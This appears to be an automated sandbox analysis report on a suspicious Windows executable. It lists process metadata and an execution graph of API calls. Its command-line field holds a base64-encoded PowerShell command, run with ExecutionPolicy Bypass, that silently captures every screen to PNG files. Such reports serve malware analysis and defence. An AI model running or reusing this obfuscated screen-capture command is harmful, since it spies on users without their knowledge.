                                                                                                                                                                                                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:10.3%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:17.1%
                                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                                              Total number of Limit Nodes:29
                                                                                                                                                                                                                                              execution_graph 19600 7ff62c0fcb50 19601 7ff62c0fcb60 19600->19601 19617 7ff62c109ba8 19601->19617 19603 7ff62c0fcb6c 19623 7ff62c0fce48 19603->19623 19605 7ff62c0fd12c 7 API calls 19607 7ff62c0fcc05 19605->19607 19606 7ff62c0fcb84 _RTC_Initialize 19615 7ff62c0fcbd9 19606->19615 19628 7ff62c0fcff8 19606->19628 19609 7ff62c0fcb99 19631 7ff62c109014 19609->19631 19615->19605 19616 7ff62c0fcbf5 19615->19616 19618 7ff62c109bb9 19617->19618 19619 7ff62c104f08 _get_daylight 11 API calls 19618->19619 19620 7ff62c109bc1 19618->19620 19621 7ff62c109bd0 19619->19621 19620->19603 19622 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 19621->19622 19622->19620 19624 7ff62c0fce59 19623->19624 19627 7ff62c0fce5e __scrt_acquire_startup_lock 19623->19627 19625 7ff62c0fd12c 7 API calls 19624->19625 19624->19627 19626 7ff62c0fced2 19625->19626 19627->19606 19656 7ff62c0fcfbc 19628->19656 19630 7ff62c0fd001 19630->19609 19632 7ff62c109034 19631->19632 19654 7ff62c0fcba5 19631->19654 19633 7ff62c10903c 19632->19633 19634 7ff62c109052 GetModuleFileNameW 19632->19634 19635 7ff62c104f08 _get_daylight 11 API calls 19633->19635 19638 7ff62c10907d 19634->19638 19636 7ff62c109041 19635->19636 19637 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 19636->19637 19637->19654 19671 7ff62c108fb4 19638->19671 19641 7ff62c1090c5 19642 7ff62c104f08 _get_daylight 11 API calls 19641->19642 19643 7ff62c1090ca 19642->19643 19644 7ff62c10a948 __free_lconv_mon 11 API calls 19643->19644 19644->19654 19645 7ff62c1090ff 19647 7ff62c10a948 __free_lconv_mon 11 API calls 19645->19647 19646 7ff62c1090dd 19646->19645 19648 7ff62c10912b 19646->19648 19649 7ff62c109144 19646->19649 19647->19654 19650 7ff62c10a948 __free_lconv_mon 11 API calls 19648->19650 19651 7ff62c10a948 __free_lconv_mon 11 API calls 19649->19651 19652 7ff62c109134 19650->19652 19651->19645 19653 7ff62c10a948 __free_lconv_mon 11 API calls 19652->19653 19653->19654 19654->19615 19655 7ff62c0fd0cc InitializeSListHead 19654->19655 19657 7ff62c0fcfd6 19656->19657 19659 7ff62c0fcfcf 19656->19659 19660 7ff62c10a1ec 19657->19660 19659->19630 19663 7ff62c109e28 19660->19663 19670 7ff62c1102d8 EnterCriticalSection 19663->19670 19672 7ff62c109004 19671->19672 19673 7ff62c108fcc 19671->19673 19672->19641 19672->19646 19673->19672 19674 7ff62c10eb98 _get_daylight 11 API calls 19673->19674 19675 7ff62c108ffa 19674->19675 19676 7ff62c10a948 __free_lconv_mon 11 API calls 19675->19676 19676->19672 19444 7ff62c109961 19445 7ff62c10a3d8 45 API calls 19444->19445 19446 7ff62c109966 19445->19446 19447 7ff62c1099d7 19446->19447 19448 7ff62c10998d GetModuleHandleW 19446->19448 19456 7ff62c109864 19447->19456 19448->19447 19450 7ff62c10999a 19448->19450 19450->19447 19470 7ff62c109a88 GetModuleHandleExW 19450->19470 19476 7ff62c1102d8 EnterCriticalSection 19456->19476 19471 7ff62c109abc GetProcAddress 19470->19471 19472 7ff62c109ae5 19470->19472 19473 7ff62c109ace 19471->19473 19474 7ff62c109aea FreeLibrary 19472->19474 19475 7ff62c109af1 19472->19475 19473->19472 19474->19475 19475->19447 19804 7ff62c11abe3 19805 7ff62c11abf3 19804->19805 19808 7ff62c105478 LeaveCriticalSection 19805->19808 19743 7ff62c11ad69 19746 7ff62c105478 LeaveCriticalSection 19743->19746 16908 7ff62c0fcc3c 16929 7ff62c0fce0c 16908->16929 16911 7ff62c0fcd88 17083 7ff62c0fd12c IsProcessorFeaturePresent 16911->17083 16912 7ff62c0fcc58 __scrt_acquire_startup_lock 16914 7ff62c0fcd92 16912->16914 16919 7ff62c0fcc76 __scrt_release_startup_lock 16912->16919 16915 7ff62c0fd12c 7 API calls 16914->16915 16917 7ff62c0fcd9d __GetCurrentState 16915->16917 16916 7ff62c0fcc9b 16918 7ff62c0fcd21 16935 7ff62c0fd274 16918->16935 16919->16916 16919->16918 17072 7ff62c109b2c 16919->17072 16921 7ff62c0fcd26 16938 7ff62c0f1000 16921->16938 16926 7ff62c0fcd49 16926->16917 17079 7ff62c0fcf90 16926->17079 16930 7ff62c0fce14 16929->16930 16931 7ff62c0fce20 __scrt_dllmain_crt_thread_attach 16930->16931 16932 7ff62c0fcc50 16931->16932 16933 7ff62c0fce2d 16931->16933 16932->16911 16932->16912 16933->16932 17090 7ff62c0fd888 16933->17090 17117 7ff62c11a4d0 16935->17117 16937 7ff62c0fd28b GetStartupInfoW 16937->16921 16939 7ff62c0f1009 16938->16939 17119 7ff62c105484 16939->17119 16941 7ff62c0f37fb 17126 7ff62c0f36b0 16941->17126 16946 7ff62c0fc550 _log10_special 8 API calls 16949 7ff62c0f3ca7 16946->16949 16947 7ff62c0f383c 17286 7ff62c0f1c80 16947->17286 16948 7ff62c0f391b 17295 7ff62c0f45c0 16948->17295 17077 7ff62c0fd2b8 GetModuleHandleW 16949->17077 16952 7ff62c0f385b 17198 7ff62c0f8830 16952->17198 16955 7ff62c0f396a 17318 7ff62c0f2710 16955->17318 16957 7ff62c0f388e 16966 7ff62c0f38bb __std_exception_destroy 16957->16966 17290 7ff62c0f89a0 16957->17290 16959 7ff62c0f395d 16960 7ff62c0f3984 16959->16960 16961 7ff62c0f3962 16959->16961 16962 7ff62c0f1c80 49 API calls 16960->16962 17314 7ff62c10004c 16961->17314 16965 7ff62c0f39a3 16962->16965 16971 7ff62c0f1950 115 API calls 16965->16971 16968 7ff62c0f8830 14 API calls 16966->16968 16974 7ff62c0f38de __std_exception_destroy 16966->16974 16968->16974 16969 7ff62c0f3a0b 16970 7ff62c0f89a0 40 API calls 16969->16970 16972 7ff62c0f3a17 16970->16972 16973 7ff62c0f39ce 16971->16973 16975 7ff62c0f89a0 40 API calls 16972->16975 16973->16952 16976 7ff62c0f39de 16973->16976 16980 7ff62c0f390e __std_exception_destroy 16974->16980 17329 7ff62c0f8940 16974->17329 16977 7ff62c0f3a23 16975->16977 16978 7ff62c0f2710 54 API calls 16976->16978 16979 7ff62c0f89a0 40 API calls 16977->16979 17061 7ff62c0f3808 __std_exception_destroy 16978->17061 16979->16980 16981 7ff62c0f8830 14 API calls 16980->16981 16982 7ff62c0f3a3b 16981->16982 16983 7ff62c0f3a60 __std_exception_destroy 16982->16983 16984 7ff62c0f3b2f 16982->16984 16986 7ff62c0f8940 40 API calls 16983->16986 16997 7ff62c0f3aab 16983->16997 16985 7ff62c0f2710 54 API calls 16984->16985 16985->17061 16986->16997 16987 7ff62c0f8830 14 API calls 16988 7ff62c0f3bf4 __std_exception_destroy 16987->16988 16989 7ff62c0f3d41 16988->16989 16990 7ff62c0f3c46 16988->16990 17336 7ff62c0f44e0 16989->17336 16992 7ff62c0f3cd4 16990->16992 16993 7ff62c0f3c50 16990->16993 16995 7ff62c0f8830 14 API calls 16992->16995 17211 7ff62c0f90e0 16993->17211 16999 7ff62c0f3ce0 16995->16999 16996 7ff62c0f3d4f 17000 7ff62c0f3d65 16996->17000 17001 7ff62c0f3d71 16996->17001 16997->16987 17002 7ff62c0f3c61 16999->17002 17005 7ff62c0f3ced 16999->17005 17339 7ff62c0f4630 17000->17339 17004 7ff62c0f1c80 49 API calls 17001->17004 17007 7ff62c0f2710 54 API calls 17002->17007 17014 7ff62c0f3cc8 __std_exception_destroy 17004->17014 17008 7ff62c0f1c80 49 API calls 17005->17008 17007->17061 17011 7ff62c0f3d0b 17008->17011 17009 7ff62c0f3dbc 17261 7ff62c0f9390 17009->17261 17013 7ff62c0f3d12 17011->17013 17011->17014 17017 7ff62c0f2710 54 API calls 17013->17017 17014->17009 17015 7ff62c0f3da7 LoadLibraryExW 17014->17015 17015->17009 17016 7ff62c0f3dcf SetDllDirectoryW 17019 7ff62c0f3e02 17016->17019 17062 7ff62c0f3e52 17016->17062 17017->17061 17020 7ff62c0f8830 14 API calls 17019->17020 17028 7ff62c0f3e0e __std_exception_destroy 17020->17028 17021 7ff62c0f4000 17022 7ff62c0f402d 17021->17022 17023 7ff62c0f400a PostMessageW GetMessageW 17021->17023 17416 7ff62c0f3360 17022->17416 17023->17022 17024 7ff62c0f3f13 17266 7ff62c0f33c0 17024->17266 17031 7ff62c0f3eea 17028->17031 17035 7ff62c0f3e46 17028->17035 17034 7ff62c0f8940 40 API calls 17031->17034 17034->17062 17035->17062 17342 7ff62c0f6dc0 17035->17342 17040 7ff62c0f6fc0 FreeLibrary 17043 7ff62c0f4053 17040->17043 17048 7ff62c0f3e79 17051 7ff62c0f3e9a 17048->17051 17063 7ff62c0f3e7d 17048->17063 17363 7ff62c0f6e00 17048->17363 17051->17063 17382 7ff62c0f71b0 17051->17382 17061->16946 17062->17021 17062->17024 17063->17062 17398 7ff62c0f2a50 17063->17398 17073 7ff62c109b43 17072->17073 17074 7ff62c109b64 17072->17074 17073->16918 19439 7ff62c10a3d8 17074->19439 17078 7ff62c0fd2c9 17077->17078 17078->16926 17080 7ff62c0fcfa1 17079->17080 17081 7ff62c0fcd60 17080->17081 17082 7ff62c0fd888 7 API calls 17080->17082 17081->16916 17082->17081 17084 7ff62c0fd152 _isindst memcpy_s 17083->17084 17085 7ff62c0fd171 RtlCaptureContext RtlLookupFunctionEntry 17084->17085 17086 7ff62c0fd19a RtlVirtualUnwind 17085->17086 17087 7ff62c0fd1d6 memcpy_s 17085->17087 17086->17087 17088 7ff62c0fd208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17087->17088 17089 7ff62c0fd256 _isindst 17088->17089 17089->16914 17091 7ff62c0fd890 17090->17091 17092 7ff62c0fd89a 17090->17092 17096 7ff62c0fdc24 17091->17096 17092->16932 17097 7ff62c0fdc33 17096->17097 17098 7ff62c0fd895 17096->17098 17104 7ff62c0fde60 17097->17104 17100 7ff62c0fdc90 17098->17100 17101 7ff62c0fdcbb 17100->17101 17102 7ff62c0fdcbf 17101->17102 17103 7ff62c0fdc9e DeleteCriticalSection 17101->17103 17102->17092 17103->17101 17108 7ff62c0fdcc8 17104->17108 17109 7ff62c0fddb2 TlsFree 17108->17109 17114 7ff62c0fdd0c __vcrt_InitializeCriticalSectionEx 17108->17114 17110 7ff62c0fdd3a LoadLibraryExW 17112 7ff62c0fdd5b GetLastError 17110->17112 17113 7ff62c0fddd9 17110->17113 17111 7ff62c0fddf9 GetProcAddress 17111->17109 17112->17114 17113->17111 17115 7ff62c0fddf0 FreeLibrary 17113->17115 17114->17109 17114->17110 17114->17111 17116 7ff62c0fdd7d LoadLibraryExW 17114->17116 17115->17111 17116->17113 17116->17114 17118 7ff62c11a4c0 17117->17118 17118->16937 17118->17118 17122 7ff62c10f480 17119->17122 17120 7ff62c10f4d3 17121 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17120->17121 17125 7ff62c10f4fc 17121->17125 17122->17120 17123 7ff62c10f526 17122->17123 17429 7ff62c10f358 17123->17429 17125->16941 17437 7ff62c0fc850 17126->17437 17129 7ff62c0f3710 17439 7ff62c0f9280 FindFirstFileExW 17129->17439 17130 7ff62c0f36eb GetLastError 17444 7ff62c0f2c50 17130->17444 17134 7ff62c0f3723 17459 7ff62c0f9300 CreateFileW 17134->17459 17135 7ff62c0f377d 17470 7ff62c0f9440 17135->17470 17136 7ff62c0fc550 _log10_special 8 API calls 17139 7ff62c0f37b5 17136->17139 17139->17061 17148 7ff62c0f1950 17139->17148 17141 7ff62c0f378b 17144 7ff62c0f2810 49 API calls 17141->17144 17147 7ff62c0f3706 17141->17147 17142 7ff62c0f3734 17462 7ff62c0f2810 17142->17462 17144->17147 17146 7ff62c0f374c __vcrt_InitializeCriticalSectionEx 17146->17135 17147->17136 17149 7ff62c0f45c0 108 API calls 17148->17149 17150 7ff62c0f1985 17149->17150 17151 7ff62c0f1c43 17150->17151 17152 7ff62c0f7f90 83 API calls 17150->17152 17153 7ff62c0fc550 _log10_special 8 API calls 17151->17153 17154 7ff62c0f19cb 17152->17154 17155 7ff62c0f1c5e 17153->17155 17197 7ff62c0f1a03 17154->17197 17815 7ff62c1006d4 17154->17815 17155->16947 17155->16948 17157 7ff62c10004c 74 API calls 17157->17151 17158 7ff62c0f19e5 17159 7ff62c0f1a08 17158->17159 17160 7ff62c0f19e9 17158->17160 17819 7ff62c10039c 17159->17819 17161 7ff62c104f08 _get_daylight 11 API calls 17160->17161 17163 7ff62c0f19ee 17161->17163 17822 7ff62c0f2910 17163->17822 17165 7ff62c0f1a45 17171 7ff62c0f1a5c 17165->17171 17172 7ff62c0f1a7b 17165->17172 17166 7ff62c0f1a26 17168 7ff62c104f08 _get_daylight 11 API calls 17166->17168 17169 7ff62c0f1a2b 17168->17169 17170 7ff62c0f2910 54 API calls 17169->17170 17170->17197 17173 7ff62c104f08 _get_daylight 11 API calls 17171->17173 17174 7ff62c0f1c80 49 API calls 17172->17174 17175 7ff62c0f1a61 17173->17175 17176 7ff62c0f1a92 17174->17176 17178 7ff62c0f2910 54 API calls 17175->17178 17177 7ff62c0f1c80 49 API calls 17176->17177 17179 7ff62c0f1add 17177->17179 17178->17197 17180 7ff62c1006d4 73 API calls 17179->17180 17181 7ff62c0f1b01 17180->17181 17182 7ff62c0f1b35 17181->17182 17183 7ff62c0f1b16 17181->17183 17185 7ff62c10039c _fread_nolock 53 API calls 17182->17185 17184 7ff62c104f08 _get_daylight 11 API calls 17183->17184 17186 7ff62c0f1b1b 17184->17186 17187 7ff62c0f1b4a 17185->17187 17188 7ff62c0f2910 54 API calls 17186->17188 17189 7ff62c0f1b50 17187->17189 17190 7ff62c0f1b6f 17187->17190 17188->17197 17192 7ff62c104f08 _get_daylight 11 API calls 17189->17192 17837 7ff62c100110 17190->17837 17193 7ff62c0f1b55 17192->17193 17195 7ff62c0f2910 54 API calls 17193->17195 17195->17197 17196 7ff62c0f2710 54 API calls 17196->17197 17197->17157 17199 7ff62c0f883a 17198->17199 17200 7ff62c0f9390 2 API calls 17199->17200 17201 7ff62c0f8859 GetEnvironmentVariableW 17200->17201 17202 7ff62c0f88c2 17201->17202 17203 7ff62c0f8876 ExpandEnvironmentStringsW 17201->17203 17205 7ff62c0fc550 _log10_special 8 API calls 17202->17205 17203->17202 17204 7ff62c0f8898 17203->17204 17206 7ff62c0f9440 2 API calls 17204->17206 17207 7ff62c0f88d4 17205->17207 17208 7ff62c0f88aa 17206->17208 17207->16957 17209 7ff62c0fc550 _log10_special 8 API calls 17208->17209 17210 7ff62c0f88ba 17209->17210 17210->16957 17212 7ff62c0f90f5 17211->17212 18052 7ff62c0f8570 GetCurrentProcess OpenProcessToken 17212->18052 17215 7ff62c0f8570 7 API calls 17216 7ff62c0f9121 17215->17216 17217 7ff62c0f9154 17216->17217 17218 7ff62c0f913a 17216->17218 17220 7ff62c0f26b0 48 API calls 17217->17220 17219 7ff62c0f26b0 48 API calls 17218->17219 17221 7ff62c0f9152 17219->17221 17222 7ff62c0f9167 LocalFree LocalFree 17220->17222 17221->17222 17223 7ff62c0f9183 17222->17223 17225 7ff62c0f918f 17222->17225 18062 7ff62c0f2b50 17223->18062 17226 7ff62c0fc550 _log10_special 8 API calls 17225->17226 17227 7ff62c0f3c55 17226->17227 17227->17002 17228 7ff62c0f8660 17227->17228 17229 7ff62c0f8678 17228->17229 17230 7ff62c0f869c 17229->17230 17231 7ff62c0f86fa GetTempPathW GetCurrentProcessId 17229->17231 17233 7ff62c0f8830 14 API calls 17230->17233 18071 7ff62c0f25c0 17231->18071 17234 7ff62c0f86a8 17233->17234 18078 7ff62c0f81d0 17234->18078 17239 7ff62c0f86e8 __std_exception_destroy 17260 7ff62c0f87d4 __std_exception_destroy 17239->17260 17240 7ff62c0f8728 __std_exception_destroy 17251 7ff62c0f8765 __std_exception_destroy 17240->17251 18075 7ff62c108b68 17240->18075 17246 7ff62c0fc550 _log10_special 8 API calls 17247 7ff62c0f3cbb 17246->17247 17247->17002 17247->17014 17252 7ff62c0f9390 2 API calls 17251->17252 17251->17260 17253 7ff62c0f87b1 17252->17253 17254 7ff62c0f87e9 17253->17254 17255 7ff62c0f87b6 17253->17255 17257 7ff62c108238 38 API calls 17254->17257 17256 7ff62c0f9390 2 API calls 17255->17256 17258 7ff62c0f87c6 17256->17258 17257->17260 17259 7ff62c108238 38 API calls 17258->17259 17259->17260 17260->17246 17262 7ff62c0f93b2 MultiByteToWideChar 17261->17262 17263 7ff62c0f93d6 17261->17263 17262->17263 17265 7ff62c0f93ec __std_exception_destroy 17262->17265 17264 7ff62c0f93f3 MultiByteToWideChar 17263->17264 17263->17265 17264->17265 17265->17016 17277 7ff62c0f33ce memcpy_s 17266->17277 17267 7ff62c0fc550 _log10_special 8 API calls 17269 7ff62c0f3664 17267->17269 17268 7ff62c0f35c7 17268->17267 17269->17061 17285 7ff62c0f90c0 LocalFree 17269->17285 17271 7ff62c0f1c80 49 API calls 17271->17277 17272 7ff62c0f35e2 17274 7ff62c0f2710 54 API calls 17272->17274 17274->17268 17277->17268 17277->17271 17277->17272 17278 7ff62c0f35c9 17277->17278 17280 7ff62c0f2a50 54 API calls 17277->17280 17283 7ff62c0f35d0 17277->17283 18362 7ff62c0f4560 17277->18362 18368 7ff62c0f7e20 17277->18368 18379 7ff62c0f1600 17277->18379 18427 7ff62c0f7120 17277->18427 18431 7ff62c0f4190 17277->18431 18475 7ff62c0f4450 17277->18475 17279 7ff62c0f2710 54 API calls 17278->17279 17279->17268 17280->17277 17284 7ff62c0f2710 54 API calls 17283->17284 17284->17268 17287 7ff62c0f1ca5 17286->17287 17288 7ff62c104984 49 API calls 17287->17288 17289 7ff62c0f1cc8 17288->17289 17289->16952 17291 7ff62c0f9390 2 API calls 17290->17291 17292 7ff62c0f89b4 17291->17292 17293 7ff62c108238 38 API calls 17292->17293 17294 7ff62c0f89c6 __std_exception_destroy 17293->17294 17294->16966 17296 7ff62c0f45cc 17295->17296 17297 7ff62c0f9390 2 API calls 17296->17297 17298 7ff62c0f45f4 17297->17298 17299 7ff62c0f9390 2 API calls 17298->17299 17300 7ff62c0f4607 17299->17300 18642 7ff62c105f94 17300->18642 17303 7ff62c0fc550 _log10_special 8 API calls 17304 7ff62c0f392b 17303->17304 17304->16955 17305 7ff62c0f7f90 17304->17305 17306 7ff62c0f7fb4 17305->17306 17307 7ff62c1006d4 73 API calls 17306->17307 17312 7ff62c0f808b __std_exception_destroy 17306->17312 17308 7ff62c0f7fd0 17307->17308 17308->17312 19033 7ff62c1078c8 17308->19033 17310 7ff62c1006d4 73 API calls 17313 7ff62c0f7fe5 17310->17313 17311 7ff62c10039c _fread_nolock 53 API calls 17311->17313 17312->16959 17313->17310 17313->17311 17313->17312 17315 7ff62c10007c 17314->17315 19048 7ff62c0ffe28 17315->19048 17317 7ff62c100095 17317->16955 17319 7ff62c0fc850 17318->17319 17320 7ff62c0f2734 GetCurrentProcessId 17319->17320 17321 7ff62c0f1c80 49 API calls 17320->17321 17322 7ff62c0f2787 17321->17322 17323 7ff62c104984 49 API calls 17322->17323 17324 7ff62c0f27cf 17323->17324 17325 7ff62c0f2620 12 API calls 17324->17325 17326 7ff62c0f27f1 17325->17326 17327 7ff62c0fc550 _log10_special 8 API calls 17326->17327 17328 7ff62c0f2801 17327->17328 17328->17061 17330 7ff62c0f9390 2 API calls 17329->17330 17331 7ff62c0f895c 17330->17331 17332 7ff62c0f9390 2 API calls 17331->17332 17333 7ff62c0f896c 17332->17333 17334 7ff62c108238 38 API calls 17333->17334 17335 7ff62c0f897a __std_exception_destroy 17334->17335 17335->16969 17337 7ff62c0f1c80 49 API calls 17336->17337 17338 7ff62c0f44fd 17337->17338 17338->16996 17340 7ff62c0f1c80 49 API calls 17339->17340 17341 7ff62c0f4660 17340->17341 17341->17014 17343 7ff62c0f6dd5 17342->17343 17344 7ff62c0f3e64 17343->17344 17345 7ff62c104f08 _get_daylight 11 API calls 17343->17345 17348 7ff62c0f7340 17344->17348 17346 7ff62c0f6de2 17345->17346 17347 7ff62c0f2910 54 API calls 17346->17347 17347->17344 19059 7ff62c0f1470 17348->19059 17350 7ff62c0f7368 17351 7ff62c0f4630 49 API calls 17350->17351 17357 7ff62c0f74b9 __std_exception_destroy 17350->17357 17352 7ff62c0f738a 17351->17352 17353 7ff62c0f738f 17352->17353 17354 7ff62c0f4630 49 API calls 17352->17354 17355 7ff62c0f2a50 54 API calls 17353->17355 17356 7ff62c0f73ae 17354->17356 17355->17357 17356->17353 17358 7ff62c0f4630 49 API calls 17356->17358 17357->17048 17359 7ff62c0f73ca 17358->17359 17359->17353 17379 7ff62c0f6e1c 17363->17379 17364 7ff62c0f6f3f 17365 7ff62c0fc550 _log10_special 8 API calls 17364->17365 17367 7ff62c0f1840 45 API calls 17367->17379 17368 7ff62c0f6faa 17370 7ff62c0f2710 54 API calls 17368->17370 17369 7ff62c0f1c80 49 API calls 17369->17379 17370->17364 17371 7ff62c0f6f97 17373 7ff62c0f2710 54 API calls 17371->17373 17372 7ff62c0f4560 10 API calls 17372->17379 17373->17364 17374 7ff62c0f7e20 52 API calls 17374->17379 17375 7ff62c0f2a50 54 API calls 17375->17379 17376 7ff62c0f6f84 17377 7ff62c0f2710 54 API calls 17376->17377 17377->17364 17378 7ff62c0f1600 118 API calls 17378->17379 17379->17364 17379->17367 17379->17368 17379->17369 17379->17371 17379->17372 17379->17374 17379->17375 17379->17376 17379->17378 17380 7ff62c0f6f6d 17379->17380 19089 7ff62c0f8e80 17382->19089 17399 7ff62c0fc850 17398->17399 19165 7ff62c0f6360 17416->19165 17424 7ff62c0f3399 17425 7ff62c0f3670 17424->17425 17426 7ff62c0f367e 17425->17426 17427 7ff62c0f368f 17426->17427 19438 7ff62c0f8e60 FreeLibrary 17426->19438 17427->17040 17436 7ff62c10546c EnterCriticalSection 17429->17436 17438 7ff62c0f36bc GetModuleFileNameW 17437->17438 17438->17129 17438->17130 17440 7ff62c0f92d2 17439->17440 17441 7ff62c0f92bf FindClose 17439->17441 17442 7ff62c0fc550 _log10_special 8 API calls 17440->17442 17441->17440 17443 7ff62c0f371a 17442->17443 17443->17134 17443->17135 17445 7ff62c0fc850 17444->17445 17446 7ff62c0f2c70 GetCurrentProcessId 